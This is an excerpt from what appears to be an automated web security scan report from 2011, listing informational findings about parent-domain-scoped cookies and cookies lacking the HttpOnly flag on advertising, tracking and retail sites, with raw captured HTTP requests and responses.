GET /TagPublish/getad.aspx?tagver=1&ca=VIEWAD&cp=523987&ct=75238&cf=728X90&cn=1&rq=1&dw=1136&cwu=http%3A%2F%2Fwww.telegraph.co.uk%2Fsponsored%2Ftravel%2Fdisney%2F8509938%2FDisney-Cruise-Line-A-world-of-entertainment.html&mrnd=36530124&if=0&tl=1&pxy=568,6&cxy=1136,18&dxy=1136,18&tz=300&ln=en-US HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
Referer: http://www.telegraph.co.uk/sponsored/travel/disney/8509938/Disney-Cruise-Line-A-world-of-entertainment.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cwbh1=2532%3B06%2F14%2F2011%3BAMQU1; V=8vciuQJMXXJY; pb_rtb_ev=1:531292.AG-00000001389358554.0; C2W4=3EtJ7FDeWFTzZJDT0WzXPE0M3LUNpfc5osYrUGLfF5OzhXGVekceXQQ; cw=cw

Response

HTTP/1.1 302 Moved Temporarily
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
CW-Server: CW-WEB28
Location: /TagPublish/STB.htm?aspxerrorpath=/TagPublish/getad.aspx
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 173
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Vary: Accept-Encoding
Date: Mon, 16 May 2011 01:20:42 GMT
Connection: close
Set-Cookie: V=8vciuQJMXXJY; domain=.contextweb.com; expires=Wed, 16-May-2012 01:20:42 GMT; path=/

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="/TagPublish/STB.htm?aspxerrorpath=/TagPublish/getad.aspx">here</a>.</h2>
</body></html>

15.77. http://tags.bluekai.com/site/2948 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tags.bluekai.com
Path:	/site/2948

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

bklc=4dd0804f; expires=Wed, 18-May-2011 01:39:27 GMT; path=/; domain=.bluekai.com
bk=e/5GeOcyjISd8JkA; expires=Sat, 12-Nov-2011 01:39:27 GMT; path=/; domain=.bluekai.com
bkc=KJhgTVjQIwsWAVamlxP4JQjtCCRQdpAfv+XwiJc81uy/FCQe961XAJ24YIvpQwAhuchmnQSsU51jsY8PUdOkO13OIY7B3cpcOkxIi/qh8UQjsYJDszaXJiMdMHGeYC2AcTyw9w2Hv7R=; expires=Sat, 12-Nov-2011 01:39:27 GMT; path=/; domain=.bluekai.com
bkst=KJhMR5Mwhze9pkYSk8tUU8TlLIbYnyFeOD0CaZTsOCDsA8xD9dmAj9F5PWFpJaNexT+AUKmDNsH5X0unjBBARy1pDt1edySxKMkKOQRKOGr081puxYd4i9iF0WFP/waP4sCs9y9C6uP4; expires=Sat, 12-Nov-2011 01:39:27 GMT; path=/; domain=.bluekai.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site/2948?phint=idswap_partner%3Dbk&id=4dd07bc8-e97b-118c-3dec-7b8c5c306530 HTTP/1.1
Host: tags.bluekai.com
Proxy-Connection: keep-alive
Referer: http://tags.bluekai.com/psite/1846?partner=1&ret=html&uhint=na_id%3d2011051519270862126421219180&phint=__bk_t%3dFingerhut:%20Apply%20For%20Credit%20Get%20Low%20Monthly%20Payments&phint=__bk_k%3dApply%20for%20Credit,%20Low%20Monthly%20Payments,%20Apparel,%20Electronics,%20Bed,%20Bath,%20Toys,%20Video%20Games,%20MP3%20Players,%20Home%20Furnishings&limit=4
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bkp1=; bku=cQ6991Cf6W6Oh0NB; bkou=KJhMRsOQRsq/pupQjp96B2Rp+eEV1p/66E101E8H4zWUv1790oYUsJIj/LBQjsOGSsO3SsoGSVHrRsaZjsCAjQ/AeY6Bnxp0S0dT9Q9r2OO7; bklc=4dd07e99; bk=6pPBWOcyjISd8JkA; bkc=KJyERtOQis5CR1iFFKenh1eY/9qAh0ehmqARscjBjtYTPclOkhWGOIv7Bvw0cH+xIu9Sho4MjVY/DsDWX8ZQde53eYCXAc6ywQY45HrN; bko=KJ0qh1q91nwrQiXn9y9xnynH; bkst=KJhMR5Mwhze9pkYSk8tUU8TlLIbYnyFeOD0CaZT1/EkKOQRKOGr081puxYd4i9iF0WFP/waP4sCv9zfScFR=; bkw5=KJhM6tJQRmO3jI9YDoy1MdxjsOQjmnktEV5QI9KP1VBARsOZucOe0OQTxVuK9uAVCM/FC1yleTM1OUSxsv1lxQR9e6zwLy==; bkdc=res

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:39:27 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: bklc=4dd0804f; expires=Wed, 18-May-2011 01:39:27 GMT; path=/; domain=.bluekai.com
Set-Cookie: bk=e/5GeOcyjISd8JkA; expires=Sat, 12-Nov-2011 01:39:27 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkc=KJhgTVjQIwsWAVamlxP4JQjtCCRQdpAfv+XwiJc81uy/FCQe961XAJ24YIvpQwAhuchmnQSsU51jsY8PUdOkO13OIY7B3cpcOkxIi/qh8UQjsYJDszaXJiMdMHGeYC2AcTyw9w2Hv7R=; expires=Sat, 12-Nov-2011 01:39:27 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkst=KJhMR5Mwhze9pkYSk8tUU8TlLIbYnyFeOD0CaZTsOCDsA8xD9dmAj9F5PWFpJaNexT+AUKmDNsH5X0unjBBARy1pDt1edySxKMkKOQRKOGr081puxYd4i9iF0WFP/waP4sCs9y9C6uP4; expires=Sat, 12-Nov-2011 01:39:27 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkdc=res; expires=Tue, 17-May-2011 01:39:27 GMT; path=/; domain=.bluekai.com
P3P: CP="NOI DSP COR CUR ADMo DEVo PSAo PSDo OUR SAMo BUS UNI NAV", policyref="http://tags.bluekai.com/w3c/p3p.xml"
Expires: Tue, 17 May 2011 01:39:27 GMT
Cache-Control: max-age=86400, private
BK-Server: d08b
Content-Length: 62
Content-Type: image/gif

GIF89a.............!..NETSCAPE2.0.....!.. ....,...........L..;

15.78. http://tags.bluekai.com/site/3358 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tags.bluekai.com
Path:	/site/3358

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

bklc=4dd07d53; expires=Wed, 18-May-2011 01:26:43 GMT; path=/; domain=.bluekai.com
bk=uiT+m1V5c/sd8JkA; expires=Sat, 12-Nov-2011 01:26:43 GMT; path=/; domain=.bluekai.com
bkc=KJpM8sJQteV5QKau2xP4HQRsOATQwbDjkKdRQ1Gc6EYIcYXexTx3/8Mwp19s8g2HR6eChf9QI99z9hS2; expires=Sat, 12-Nov-2011 01:26:43 GMT; path=/; domain=.bluekai.com
bkst=KJhMRjeMjVeQRq9GuXTLe4E0MRMyiQ0rFK9n9eUdOk1=; expires=Sat, 12-Nov-2011 01:26:43 GMT; path=/; domain=.bluekai.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site/3358?id=8vciuQJMXXJY HTTP/1.1
Host: tags.bluekai.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/4462/5032/7102-2.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bk=0E0bL1V5c/sd8JkA; bkc=KJpM8sJQteV5QKaW2xP4OieQOwJEZkc8MQtG4WRsOaImkTWCxoDHC42sePDICQUOOy9JihjR; bko=; bkou=KJhMRsOQRsq/pupQjp96B2Rp+eEV1p/66E101E8H4zWU9WMPO3L=; bkp1=; bkst=KJhMRjeMjVeQRq9GuXTLe4E0MRMyiMhH4zWU9e4BOLR=; bku=cQ6991Cf6W6Oh0NB; bkw5=; bkdc=res

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:26:43 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: bklc=4dd07d53; expires=Wed, 18-May-2011 01:26:43 GMT; path=/; domain=.bluekai.com
Set-Cookie: bk=uiT+m1V5c/sd8JkA; expires=Sat, 12-Nov-2011 01:26:43 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkc=KJpM8sJQteV5QKau2xP4HQRsOATQwbDjkKdRQ1Gc6EYIcYXexTx3/8Mwp19s8g2HR6eChf9QI99z9hS2; expires=Sat, 12-Nov-2011 01:26:43 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkst=KJhMRjeMjVeQRq9GuXTLe4E0MRMyiQ0rFK9n9eUdOk1=; expires=Sat, 12-Nov-2011 01:26:43 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkdc=res; expires=Tue, 17-May-2011 01:26:43 GMT; path=/; domain=.bluekai.com
P3P: CP="NOI DSP COR CUR ADMo DEVo PSAo PSDo OUR SAMo BUS UNI NAV", policyref="http://tags.bluekai.com/w3c/p3p.xml"
Expires: Tue, 17 May 2011 01:26:43 GMT
Cache-Control: max-age=86400, private
BK-Server: c53d
Content-Length: 62
Content-Type: image/gif

GIF89a.............!..NETSCAPE2.0.....!.. ....,...........L..;

15.79. http://www.imiclk.com/cgi/r.cgi previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.imiclk.com
Path:	/cgi/r.cgi

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

CH=24785,53brJ,22244,53br0,28363,53br0,24783,53brJ,33114,00000,24782,53brJ,32619,00000,32620,00000; domain=.imiclk.com; path=/; expires=Tue, 15-May-2012 01:01:26 GMT
RQ=1267,53br0,2831,53br0,2848,53br0,2849,53br0,2852,53br0,2850,53br0,2888,53br2,2890,53br0,2921,53br0,2887,53br0,3468,53br2,3387,53br2,3388,53brH,3389,53brJ; domain=.imiclk.com; path=/; expires=Tue, 15-May-2012 01:01:26 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /cgi/r.cgi?m=3&mid=vj1j4Xj8&did=womens HTTP/1.1
Host: www.imiclk.com
Proxy-Connection: keep-alive
Referer: http://www.armaniexchange.com/category/womens.do
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: YU=593390c429fc100c2c7fda8faa0ba970-53br0; OL8U=2-2-2615A602015883100AB3965ADAC58D262570467070CBBA4CE3908934A2129506-4331228C08AC1DCF1AA5BA626D0099EC942F38B08D6AB5ACFA20E1D9B133F1CC; CH=28363,53br0,22244,53br0,24785,53brH,24783,53brH,33114,00000,24782,53brH,32619,00000,32620,00000; RQ=3387,53br2,3388,53brH,1267,53br0,2831,53br0,2848,53br0,2849,53br0,2852,53br0,2850,53br0,2888,53br2,2890,53br0,2921,53br0,2887,53br0,3468,53br2

Response

HTTP/1.1 200 OK
Server: Apache/2.0.63 (CentOS)
P3P: policyref="/w3c/p3p.xml", CP="DSP NOI ADM PSAo PSDo OUR BUS NAV COM UNI INT"
Cache-Control: no-store
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Content-Length: 224
Date: Mon, 16 May 2011 01:43:17 GMT
Connection: close
Set-Cookie: CH=24785,53brJ,22244,53br0,28363,53br0,24783,53brJ,33114,00000,24782,53brJ,32619,00000,32620,00000; domain=.imiclk.com; path=/; expires=Tue, 15-May-2012 01:01:26 GMT
Set-Cookie: RQ=1267,53br0,2831,53br0,2848,53br0,2849,53br0,2852,53br0,2850,53br0,2888,53br2,2890,53br0,2921,53br0,2887,53br0,3468,53br2,3387,53br2,3388,53brH,3389,53brJ; domain=.imiclk.com; path=/; expires=Tue, 15-May-2012 01:01:26 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 3.2//EN"><html><head><title></title></head><body>
<img src="http://pixel.mathtag.com/data/img?mt_id=100038&mt_dcid=1305510197" alt="" border="0" width="1" h
...[SNIP]...

15.80. http://www.mcafeesecure.com/ads/1002/25 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.mcafeesecure.com
Path:	/ads/1002/25

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

adclick=1002-25; domain=.mcafeesecure.com; path=/; expires=Mon, 13-Jun-2011 01:39:27 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ads/1002/25 HTTP/1.1
Host: www.mcafeesecure.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmx=185732405.; __utmxx=185732405.; __utmz=185732405.1305377534.1.1.utmcsr=server.iad.liveperson.net|utmccn=(referral)|utmcmd=referral|utmcct=/hcp/integration/hackersafe/hackersafe-grey.html; adclick=1103-2; CAMEFROM=www.fingerhut.com; resin=1724539402.20480.0000; __utma=185732405.396205410.1305377534.1305377534.1305509530.2; __utmc=185732405; __utmb=185732405.1.10.1305509530

Response

HTTP/1.1 302 Found
Server: McAfeeSecure
Vary: Accept-Encoding
Location: http://www.siteadvisor.com/download/windows.html?cid=64895
Set-Cookie: adclick=1002-25; domain=.mcafeesecure.com; path=/; expires=Mon, 13-Jun-2011 01:39:27 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 96
Connection: close
Date: Mon, 16 May 2011 01:39:27 GMT

The URL has moved <a href="http://www.siteadvisor.com/download/windows.html?cid=64895">here</a>

15.81. http://www.passporterboards.com/forums/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.passporterboards.com
Path:	/forums/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

bblastvisit=1305508789; expires=Tue, 15-May-2012 01:31:56 GMT; path=/; domain=.passporterboards.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

16. Cookie without HttpOnly flag set previous next
There are 200 instances of this issue:

http://disneycruise.disney.go.com/reservations/customize
http://eval.bizrate.com/js/survey_126457_1.js
http://ots.optimize.webtrends.com/ots/ots/js-3.0/90335/317ef0c53ce434d79761760b1d40347dce1dade30efce8abb9cea602dae5fab7b06f4e93bb3f667a07ee563cf7bc2d4232f06bb7f9551780b68f113eb9a117f9a8f5e92ac06d40757c1f327af58842cd4ede645d42893c1cf7567b7c149eccb35356fa98e2ffc3ea1f7e23859254a9bc687cbd012c1294d6dd5fa4663a918ff41c437a0301317f373b3c0992b6d96981bda65e1d1fe4c47301325b8ca01bf7ba47ae225e2a2f2e826ec46b03e5fe8b034e8401cc58a67b3ef660684ba53727e6b4a59cf85b09fac363756abce482b7010a01a64b1139be6bc27a0107ea3fafa6bc66290a5e4901c66449407eaead3c062013e948ce98836c6ae4f48bc0a677d48de9109ba9f81c0adda9668dcf3868ac5307153b025338ebe5b5422ea4af743d0141749c639ad70ccbd31237c2a742c40719df3207ef5dd54f702632f58045b6e44bcca9d6a9060b2ca294a1c6c3e821c27f51b4679ad80bd6619d689e737f8aad5a15363b2761f8586e4ce4695ee1944d4695e2fdbad38ff824a43cc131fd452fce2a70a89ee5a7811f32ef0c544ac6f3b9c4bdbb09c0480bbc0cdeaa5da019ab9355b6b76f9f766b060164eb11
http://ots.optimize.webtrends.com/ots/ots/js-3.0/90335/317ef0c53ce434d79761760b1d40347dce1dade30efce8abb9cea602dae5fab7b06f4e93bb3f667a07ee563cf7bc2d4232f06bb7f9551780b68f113eb9a117f9a8f5e92ac06d40757c1f327af58842cd4ede645d42893c1cf7567b7c149eccb35356fa98e2ffc3ea1f7e23859254a9bc687cbd012c1294d6dd5fa4663a918ff41c437a0301317f373b3c0992b6d96981bda65e1d1fe4c47301325b8ca01bf7ba47ae225e2a2f2e826ec46b03e5fe8b034e8401cc58a67b3ef660684ba53727e6b4a59cf85b09fac363756abce482b7010a01a64b3735b56bff791556b569e5e8e5242213410e46817a400930a8a5210c391eb4099bcdd45011c8c2b4edf7228481e91dc3f9c6351ac5eb78c686743ae34c0f193c0f5e25e2f9c11e68faf23a27751d30db21d18f34cfde0468a1a617f42a00cf7209ab4a9216327370b8d618eca71f90ecccf5415273b68aada887b54ba32604e61fcb904980258a678379798baa4414353b6f78ea033614b82e0ab09a5562e8c8d6a2c4c0b824a928c637f44222cd3c68a4f089e2c04760f501414adef2a7cca4fa49831a56ff1edcb91ce345c1d008e6f37a87293457074e626b842250ca5e307da3a5e46ffb4c736227395daeaaa5bc747ad115097fe63832d4021305db140de7cc84ebd182f34aa56da56d73a5ff1e5bcb2efdbf54edfb0fc746c5c8871b2ed942f4ea6203be921f533a8d8b6dfd5eb99b71b31a912f060e8d9da8ae0dd543ae249e956a8b64b1964d41954eca97247abd18e042fcb7170aed7bb7e0d7cee603452c43
http://shop.pacsun.com/
http://sony.links.origin.channelintelligence.com/pages/wl.asp
http://ttwbs.channelintelligence.com/
http://us.playstation.com/uwps/TickerMessages
http://www.fingerhut.com/
http://www.fingerhut.com/fingerhut/css/sifr-config.jsp
http://www.fingerhut.com/includes/financial_snapshot.jsp
http://www.fingerhut.com/js/config_dhtml.jsp
http://www.fingerhut.com/js/financial-snapshot.jsp
http://www.fingerhut.com/js/persistent_cart.jsp
http://www.fingerhut.com/js/s_code.jsp
http://www.fingerhut.com/js/scene7/scene7.jsp
http://www.fingerhut.com/js/sifr.jsp
https://www.fingerhut.com/fingerhut/css/sifr-config.jsp
https://www.fingerhut.com/js/persistent_cart.jsp
https://www.fingerhut.com/js/s_code.jsp
https://www.fingerhut.com/js/sifr.jsp
https://www.fingerhut.com/user/login.jsp
http://www.sonystyle.com/webapp/wcs/stores/servlet/StoreCatalogDisplay
http://www.viddler.com/thumbnail/7d63c65a/
http://a.tribalfusion.com/j.ad
http://action.media6degrees.com/orbserv/hbpix
http://ad.turn.com/server/ads.js
http://ad.turn.com/server/pixel.htm
http://ad.yieldmanager.com/imp
http://ad.yieldmanager.com/pixel
http://ads.revsci.net/adserver/ako
http://adserver.veruta.com/track.fcgi
http://ak1.abmr.net/is/images3.pacsun.com
http://ak1.abmr.net/is/tag.admeld.com
http://ak1.abmr.net/is/tag.contextweb.com
http://ak1.abmr.net/is/www.imiclk.com
http://analytics.apnewsregistry.com/analytics/v2/image.svc/NYDUN/RWS/observertoday.com/MAI/559280/E/prod/PC/Basic/AT/A
http://b.scorecardresearch.com/b
http://b.scorecardresearch.com/r
http://bh.contextweb.com/bh/rtset
http://c7.zedo.com/utils/ecSet.js
http://community.petco.com/discussions/Bird_Discussion_Forum/fd03p00v06d1
http://community.petco.com/discussions/Cat_Discussion_Forum/fd03p00v02d1
http://community.petco.com/discussions/Dog_Discussion_Forum/fd03p00v01d1
http://community.petco.com/discussions/Ferret_Discussion_Forum/fd03p00v07d1
http://community.petco.com/discussions/Fish_Discussion_Forum/fd03p00v03d1
http://community.petco.com/discussions/Reptile_Discussion_Forum/fd03p00v05d1
http://community.petco.com/discussions/Small_Animal_Discussion_Forum/fd03p00v04d1
http://community.petco.com/discussions/Social_Applications_Polls/fd03p00v00apoll
http://community.petco.com/n/blogs/blog.aspx
http://community.petco.com/n/pfx/forum.aspx
http://contextweb-match.dotomi.com/
http://ctix8.cheaptickets.com/dcssufut800000w4l0d2qm89z_3g4o/dcs.gif
http://cw-m.d.chango.com/m/cw
http://d.audienceiq.com/r/dm/mkt/44/mpid//mpuid/4325897289836481830
http://d.audienceiq.com/r/dm/mkt/73/mpid//mpuid/4325897289836481830
http://d.audienceiq.com/r/du/id/L2NzaWQvNS9leHRwaWQvNA/extuid/0
http://d.mediabrandsww.com/r/dm/mkt/3/mpid//mpuid/4325897289836481830
http://d.p-td.com/r/dm/mkt/4/mpid//mpuid/4325897289836481830
http://d.p-td.com/r/dm/mkt/4/mpid//mpuid/4325897289836481830/mchpid/9/url/
http://d.turn.com/r/dd/id/L2NzaWQvMS9jaWQvMzMxMDg2My90LzI/cat/,/id/L2NzaWQvMS9jaWQvMzMxMTIxNy90LzI/cat/000
http://data.adsrvr.org/map/cookie/contextweb
http://disneycruise.disney.go.com/reservations/customize
http://f.nexac.com/e/a-677/s-2140.xgi
http://gannett.gcion.com/addyn/3.0/5111.1/809051/0/-1/ADTECH
http://https.edge.ru4.com/smartserve/ad
http://i.w55c.net/ping_match.gif
http://idcs.interclick.com/Segment.aspx
http://idpix.media6degrees.com/orbserv/hbpix
http://image2.pubmatic.com/AdServer/Pug
http://includes.petsmart.com/homepage/redesigned/images/logo-facebook.gif
http://includes.petsmart.com/homepage/redesigned/images/logo-twitter.gif
http://js.revsci.net/gateway/gw.js
http://leadback.advertising.com/adcedge/lb
http://media.fastclick.net/w/tre
http://odb.outbrain.com/utils/get
http://odb.outbrain.com/utils/ping.html
http://optimized-by.rubiconproject.com/a/dk.js
http://p.brilig.com/contact/bct
http://pix04.revsci.net/D08734/a1/0/0/0.gif
http://pix04.revsci.net/E06560/b3/0/3/0902121/179920729.js
http://pix04.revsci.net/E06560/b3/0/3/0902121/480772802.js
http://pix04.revsci.net/J06575/a4/0/0/pcx.js
http://pix04.revsci.net/J06575/b3/0/3/1003161/817295946.js
http://pixel.33across.com/ps/
http://pixel.invitemedia.com/data_sync
http://pixel.mathtag.com/event/img
http://pixel.quantserve.com/pixel
http://pixel.rubiconproject.com/tap.php
http://pixel.rubiconproject.com/tap.php
http://r.openx.net/set
http://r.turn.com/r/bd
http://r.turn.com/r/beacon
http://r.turn.com/r/du/id/L21rdC8xL21jaHBpZC85/rnd/iqAJF
http://r.turn.com/server/pixel.htm
http://r1-ads.ace.advertising.com/site=786652/size=728090/u=2/bnum=71920917/hr=20/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Ftravel.usatoday.com%252Fcruises%252Fpost%252F2011%252F05%252Fdisney-cruise-line-dream-fantasy-wonder-ship-bookings%252F169725%252F1
http://sales.liveperson.net/hc/46281118/
http://sales.liveperson.net/hc/53965383/
http://sales.liveperson.net/hc/71737897/
http://secureshopping.mcafee.com/
http://secureshopping.mcafee.com/css/home.css
http://secureshopping.mcafee.com/css/public.css
http://secureshopping.mcafee.com/images/banner_arrow.gif
http://secureshopping.mcafee.com/images/banner_mfes_signup.gif
http://secureshopping.mcafee.com/images/banner_sa.gif
http://secureshopping.mcafee.com/images/banner_tp_081610.gif
http://secureshopping.mcafee.com/images/bgarea_690x250_cccccc.png
http://secureshopping.mcafee.com/images/btn_compare_up.gif
http://secureshopping.mcafee.com/images/btn_seeit_up.gif
http://secureshopping.mcafee.com/images/category_blank.png
http://secureshopping.mcafee.com/images/category_blank_background.jpg
http://secureshopping.mcafee.com/images/category_bottom.png
http://secureshopping.mcafee.com/images/category_top.png
http://secureshopping.mcafee.com/images/favicon.ico
http://secureshopping.mcafee.com/images/footer-search-bg.gif
http://secureshopping.mcafee.com/images/footer-search-left.gif
http://secureshopping.mcafee.com/images/footer-search-right.gif
http://secureshopping.mcafee.com/images/logo.gif
http://secureshopping.mcafee.com/images/nav-menu-bg.gif
http://secureshopping.mcafee.com/images/nav-menu-left.gif
http://secureshopping.mcafee.com/images/nav-menu-right.gif
http://secureshopping.mcafee.com/images/nav-menu-split.gif
http://secureshopping.mcafee.com/images/nav-menu-tab-bg.gif
http://secureshopping.mcafee.com/images/nav-menu-tab-left.gif
http://secureshopping.mcafee.com/images/nav-menu-tab-right.gif
http://secureshopping.mcafee.com/images/nav-search-bg.gif
http://secureshopping.mcafee.com/js/core.js
http://secureshopping.mcafee.com/js/ga_init.js
http://secureshopping.mcafee.com/js/ga_track_click.js
http://secureshopping.mcafee.com/js/ga_track_click_init.js
http://secureshopping.mcafee.com/js/google_ads_7409232867.js
http://segment-pixel.invitemedia.com/pixel
http://sitelife.usatoday.com/ver1.0/Content/images/no-user-image.gif
http://sitelife.usatoday.com/ver1.0/Content/images/store/13/1/6dbb68f3-e8dc-464d-81c0-091488dbd2b9.P4Avatar.jpg
http://sitelife.usatoday.com/ver1.0/Content/images/store/8/8/f80cbc5e-6704-417a-b8ad-a6e027a19299.P4Avatar.jpg
http://sitelife.usatoday.com/ver1.0/Content/images/store/9/9/792de6a9-477b-46db-891e-75ece59c0187.P4Avatar.jpg
http://sitelife.usatoday.com/ver1.0/Content/ua/images/comments/pluck-comm-action-buttons.png
http://sitelife.usatoday.com/ver1.0/Content/ua/images/comments/pluck-comm-background.png
http://sitelife.usatoday.com/ver1.0/Content/ua/images/comments/pluck-comm-reply-arrow-hide.gif
http://sitelife.usatoday.com/ver1.0/Content/ua/images/comments/pluck-comm-reply-arrow-show.gif
http://sitelife.usatoday.com/ver1.0/Content/ua/images/comments/pluck-comm-rss-button.gif
http://sitelife.usatoday.com/ver1.0/Content/ua/images/pluck-avatar-blocked.gif
http://sitelife.usatoday.com/ver1.0/Content/ua/images/pluck-avatar-default.gif
http://sitelife.usatoday.com/ver1.0/Content/ua/images/pluck-pagination-bg-2.jpg
http://sitelife.usatoday.com/ver1.0/Content/ua/images/pluck-pagination-bg.jpg
http://sitelife.usatoday.com/ver1.0/Content/ua/images/pluck-pagination-last-bg.png
http://sitelife.usatoday.com/ver1.0/Content/ua/images/pluck-pagination-next-bg.png
http://sitelife.usatoday.com/ver1.0/Content/ua/images/pluck-primary-button-left.png
http://sitelife.usatoday.com/ver1.0/Content/ua/images/pluck-primary-button-right.png
http://sitelife.usatoday.com/ver1.0/Content/ua/images/reactions/abuse/pluck-abuse-report-icon.gif
http://sitelife.usatoday.com/ver1.0/Content/ua/images/reactions/abuse/pluck-abuse-reported-icon.gif
http://sitelife.usatoday.com/ver1.0/Content/ua/images/reactions/score/pluck-thumb-up-grayed.gif
http://sitelife.usatoday.com/ver1.0/Content/ua/images/throbber.gif
http://sitelife.usatoday.com/ver1.0/Content/ua/images/throbber_circle.gif
http://sitelife.usatoday.com/ver1.0/Content/ua/images/users/pluck-recommend-user-icon.gif
http://sitelife.usatoday.com/ver1.0/Content/ua/images/util/email/pluck-email-icon.gif
http://sitelife.usatoday.com/ver1.0/Content/ua/images/util/permalink/pluck-permalink-icon.gif
http://sitelife.usatoday.com/ver1.0/Content/ua/images/util/share/pluck-share-buzz.gif
http://sitelife.usatoday.com/ver1.0/Content/ua/images/util/share/pluck-share-delicious.gif
http://sitelife.usatoday.com/ver1.0/Content/ua/images/util/share/pluck-share-digg.gif
http://sitelife.usatoday.com/ver1.0/Content/ua/images/util/share/pluck-share-fb.gif
http://sitelife.usatoday.com/ver1.0/Content/ua/images/util/share/pluck-share-ff.gif
http://sitelife.usatoday.com/ver1.0/Content/ua/images/util/share/pluck-share-linkedin.gif
http://sitelife.usatoday.com/ver1.0/Content/ua/images/util/share/pluck-share-myspace.gif
http://sitelife.usatoday.com/ver1.0/Content/ua/images/util/share/pluck-share-reddit.gif
http://sitelife.usatoday.com/ver1.0/Content/ua/images/util/share/pluck-share-slashdot.gif
http://sitelife.usatoday.com/ver1.0/Content/ua/images/util/share/pluck-share-stumble.gif
http://sitelife.usatoday.com/ver1.0/Content/ua/images/util/share/pluck-share-tumblr.gif
http://sitelife.usatoday.com/ver1.0/Content/ua/images/util/share/pluck-share-tweet.gif
http://sitelife.usatoday.com/ver1.0/Content/ua/scripts/flXHR/checkplayer.js
http://sitelife.usatoday.com/ver1.0/Content/ua/scripts/flXHR/flXHR.js
http://sitelife.usatoday.com/ver1.0/Content/ua/scripts/flXHR/flensed.js
http://sitelife.usatoday.com/ver1.0/Content/ua/scripts/flXHR/jquery.flXHRproxy.js
http://sitelife.usatoday.com/ver1.0/Content/ua/scripts/flXHR/jquery.xhr.js
http://sitelife.usatoday.com/ver1.0/Content/ua/scripts/flXHR/swfobject.js
http://sitelife.usatoday.com/ver1.0/Content/ua/scripts/pluckApps.js
http://sitelife.usatoday.com/ver1.0/Stats/Tracker.gif
http://sitelife.usatoday.com/ver1.0/USAT/pluck/comments/comments.css
http://sitelife.usatoday.com/ver1.0/USAT/pluck/pluck.css
http://sitelife.usatoday.com/ver1.0/sys/jsonp.app
http://sitelife.usatoday.com/ver1.0/usat/pluck/comments/comments.js
http://sitelife.usatoday.com/ver1.0/usat/pluck/pluck.js
http://sony.tcliveus.com/i
http://sync.mathtag.com/sync/img
http://t.invitemedia.com/track_imp
http://tag.admeld.com/ad/js/201/unitedstates/728x90/ros
http://tag.contextweb.com/TagPublish/getad.aspx
